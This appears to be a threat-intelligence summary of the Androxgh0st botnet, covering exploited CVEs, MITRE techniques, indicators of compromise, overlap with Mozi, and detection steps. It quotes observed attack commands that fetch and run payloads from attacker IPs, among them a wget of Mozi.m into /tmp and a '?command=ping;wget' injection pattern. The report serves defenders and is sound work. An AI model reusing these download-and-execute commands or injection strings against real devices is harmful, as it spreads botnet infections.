Keypoints
- Androxgh0st has been active since January 2024, targeting web servers and IoT devices and leveraging numerous CVEs for initial access.
- The botnet exploits a broad set of vulnerabilities, including TP-Link CVE-2023-1389 and GeoServer CVE-2024-36401, plus older web-app and router CVEs (PHPUnit, Laravel .env, Apache path traversal).
- Command-and-control logs show Androxgh0st downloading and executing shell/binary payloads (e.g., androx.sh, /tmp/androx) and using wget/curl workflows similar to Mozi.
- Evidence suggests operational integration or payload reuse with the Mozi botnet, including shared command paths and payload names (Mozi.m).
- Persistent techniques include appending PHP code to files, file uploads, crontab/startup modification, and credential collection/brute force against admin panels.
- CloudSEK observed over 500 infected devices and recommends immediate patching, log review, and network/process audits to mitigate compromise.
MITRE Techniques
- [T1071] Command and Control – Uses multiple command and control domains to maintain communication with compromised systems. [‘Utilizes multiple command and control domains to maintain communication with compromised systems.’]
- [T1210] Exploitation of Remote Services – Exploits vulnerabilities in remote services (web servers, routers, IoT management interfaces) to gain unauthorized access. [‘Exploits vulnerabilities in remote services to gain unauthorized access.’]
- [T1003] Credential Dumping – Collects credentials from exposed .env files and other sources and performs brute-force logins against admin endpoints. [‘Collects credentials from compromised systems to facilitate further attacks.’]
- [T1105] Remote File Copy – Downloads and executes payloads via wget/curl (e.g., Mozi.m, androx.sh) from remote hosting servers. [‘Transfers files from a remote server to the compromised system for further exploitation.’]
- [T1102] Web Service – Uses web services and misconfigured admin/logger panels to receive commands and exfiltrate data. [‘Uses web services as a means of communication and data exfiltration.’]
Indicators of Compromise
- [IP] C2 / request logger servers – 165.22.184.66, 45.55.104.59
- [IP] Payload download servers – 154.216.17.31 (TP-Link downloads), 200.124.241.140 (Netgear Mozi.m), and 45.202.35.24
- [Domain] Command/logger domain – api.next.eventsrealm.com (used as a command sender/logger)
- [File names] Downloaded/executed payloads – Mozi.m, androx.sh, /tmp/androx
- [File hashes] Androxgh0st TP-Link payload MD5s – 2403a89ab4ffec6d864ac0a7a225e99a, d9553ca3d837f261f8dfda9950978a0a, and 15 more hashes
Androxgh0st gains initial access by scanning for and exploiting known web-application and IoT/firmware CVEs (examples: PHPUnit eval-stdin, Laravel .env exposure, Apache path traversal, Metabase GeoJSON LFI, PHP-CGI argument injection CVE-2024-4577, TP-Link CVE-2023-1389, GeoServer CVE-2024-36401). Successful exploits allow arbitrary file upload, remote code execution, or command injection; attackers commonly upload or trigger small shell scripts that download and run architecture-specific binaries via wget or curl (examples observed: commands to fetch http://154.216.17[.]31/ tarm* or wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear).
Post-compromise actions include appending PHP backdoor code to existing .php files, deploying persistent scripts (crontab or startup scripts), brute-forcing admin panels (WordPress /wp-login.php, /admin_login), credential harvesting from exposed .env files, and executing downloaded binaries (chmod +x; ./binary). C2 communications and control flows are implemented over multiple domains and HTTP POST/GET interfaces; Androxgh0st shows TTP overlap with Mozi (same command injection paths, payload download patterns, and filenames), indicating payload reuse or integration.
Detection and remediation steps: review web server logs for GET/POST entries containing wget/curl or command injection patterns (e.g., ?command=ping;wget http://…/androx.sh), check for repeated failed logins on admin endpoints, inspect /tmp, /var/tmp, and /dev/shm for executable or recently modified files, audit crontab and startup scripts for unauthorized entries, monitor outbound connections to known malicious IPs/domains, run EDR/file-integrity checks, and prioritize patching of the listed vulnerable products and CVEs.